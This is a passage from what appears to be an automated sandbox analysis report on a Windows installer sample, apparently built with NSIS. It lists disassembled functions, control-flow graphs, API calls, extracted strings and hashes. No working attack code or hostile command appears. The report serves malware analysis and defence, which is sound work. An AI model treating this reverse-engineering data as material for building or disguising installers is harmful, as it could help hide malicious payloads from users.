                                                                                                                                                                                                                                                                                                          control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                                          • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                                          • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                                          • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                                          • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                                                          • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                                          • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                                                                                                                                                                                                                          Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,GrassConnectorTransThehun,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,GrassConnectorTransThehun,GrassConnectorTransThehun,00000000,00000000,GrassConnectorTransThehun,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426176,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426176,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426176,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$GrassConnectorTransThehun
                                                                                                                                                                                                                                                                                                          • API String ID: 4286501637-1809075665
                                                                                                                                                                                                                                                                                                          • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                                          • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                                                                                                                                                                                                                          Function 0040337F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 587 40337f-403398 588 4033a1-4033a9 587->588 589 40339a 587->589 590 4033b2-4033b7 588->590 591 4033ab 588->591 589->588 592 4033c7-4033d4 call 403336 590->592 593 4033b9-4033c2 call 403368 590->593 591->590 597 4033d6 592->597 598 4033de-4033e5 592->598 593->592 599 4033d8-4033d9 597->599 600 403546-403548 598->600 601 4033eb-403432 GetTickCount 598->601 604 403567-40356b 599->604 602 40354a-40354d 600->602 603 4035ac-4035af 600->603 605 403564 601->605 606 403438-403440 601->606 607 403552-40355b call 403336 602->607 608 40354f 602->608 609 4035b1 603->609 610 40356e-403574 603->610 605->604 611 403442 606->611 612 403445-403453 call 403336 606->612 607->597 620 403561 607->620 608->607 609->605 615 403576 610->615 616 403579-403587 call 403336 610->616 611->612 612->597 621 403455-40345e 612->621 615->616 616->597 624 40358d-40359f WriteFile 616->624 620->605 623 403464-403484 call 4076a0 621->623 630 403538-40353a 623->630 631 40348a-40349d GetTickCount 623->631 626 4035a1-4035a4 624->626 627 40353f-403541 624->627 626->627 629 4035a6-4035a9 626->629 627->599 629->603 630->599 632 4034e8-4034ec 631->632 633 40349f-4034a7 631->633 634 40352d-403530 632->634 635 4034ee-4034f1 632->635 636 4034a9-4034ad 633->636 637 4034af-4034e0 MulDiv wsprintfW call 404f9e 633->637 634->606 641 403536 634->641 639 403513-40351e 635->639 640 4034f3-403507 WriteFile 635->640 636->632 636->637 642 4034e5 637->642 644 403521-403525 639->644 640->627 643 403509-40350c 640->643 641->605 642->632 643->627 645 40350e-403511 643->645 644->623 646 40352b 644->646 645->644 646->605
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00426176,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                                          • String ID: (]C$... %d%%$pAB$v!B$vaB
                                                                                                                                                                                                                                                                                                          • API String ID: 651206458-484592821
                                                                                                                                                                                                                                                                                                          • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                                          • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                                                                                                                                                                                                                          Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 647 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 650 403603-403608 647->650 651 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 647->651 652 4037e2-4037e6 650->652 659 403641 651->659 660 403728-403736 call 4032d2 651->660 662 403646-40365d 659->662 666 4037f1-4037f6 660->666 667 40373c-40373f 660->667 664 403661-403663 call 403336 662->664 665 40365f 662->665 671 403668-40366a 664->671 665->664 666->652 669 403741-403759 call 403368 call 403336 667->669 670 40376b-403795 GlobalAlloc call 403368 call 40337f 667->670 669->666 698 40375f-403765 669->698 670->666 696 403797-4037a8 670->696 674 403670-403677 671->674 675 4037e9-4037f0 call 4032d2 671->675 676 4036f3-4036f7 674->676 677 403679-40368d call 405e38 674->677 675->666 683 403701-403707 676->683 684 4036f9-403700 call 4032d2 676->684 677->683 694 40368f-403696 677->694 687 403716-403720 683->687 688 403709-403713 call 4072ad 683->688 684->683 687->662 695 403726 687->695 688->687 694->683 700 403698-40369f 694->700 695->660 701 4037b0-4037b3 696->701 702 4037aa 696->702 698->666 698->670 700->683 703 4036a1-4036a8 700->703 704 4037b6-4037be 701->704 702->701 703->683 705 4036aa-4036b1 703->705 704->704 706 4037c0-4037db SetFilePointer call 405e38 704->706 705->683 707 4036b3-4036d3 705->707 710 4037e0 706->710 707->666 709 4036d9-4036dd 707->709 711 4036e5-4036ed 709->711 712 4036df-4036e3 709->712 710->652 711->683 713 4036ef-4036f1 711->713 712->695 712->711 713->683
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                                          • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                                          • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                                          • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                                          • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                                          • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                                          • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                                                                                                                                                                                                                          Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00445D80,00426176,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(004034E5,00445D80,00426176,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426176,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                                                                                                                                                                                                                                          Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNELBASE(007BC958), ref: 00402387
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
